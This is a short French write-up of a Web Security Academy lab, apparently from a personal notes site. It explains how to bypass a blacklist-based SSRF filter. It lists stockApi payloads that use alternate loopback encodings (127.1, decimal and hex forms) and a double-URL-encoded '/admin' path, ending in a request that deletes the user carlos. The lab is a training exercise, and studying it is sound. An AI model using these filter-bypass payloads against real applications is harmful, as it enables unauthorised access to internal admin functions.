SSRF avec filtre basé sur une blacklist

SSRF with blacklist-based input filter

Lab: SSRF with blacklist-based input filter | Web Security AcademyWebSecAcademy

Le laboratoire propose une fonction de vérification de stock qui permet de récupérer des données depuis un système interne. L’objectif est d’accéder à l’interface d’administration située sur http://localhost/admin et de supprimer l’utilisateur carlos. Deux mécanismes de défense faibles basés sur blacklist doivent être contournés.

Analyse et contournement

Lorsque l’on remplace le paramètre stockApi pour pointer directement vers l’admin locale, la requête est refusée :

stockApi=https://localhost/admin

Pour contourner la blacklist sur localhost, plusieurs variantes d’adresses internes sont testées :

https://127.0.0.1
https://127.13.55.222
https://127.0.1

Ces tentatives échouent également.

On essaye alors des représentations hexadécimales ou décimales de l’adresse :

https://0x7F.0x0.0x1
https://2130706433

La détection bloque toujours le chemin /admin, ce qui indique que la défense cible principalement cette chaîne spécifique.

stockApi=http://127.1/%2561dmin
stockApi=http://127.1/%2561dmin/delete?username=carlos

Mis à jour il y a 3 mois

hashtagSSRF with blacklist-based input filter

hashtagAnalyse et contournement

SSRF with blacklist-based input filter

Analyse et contournement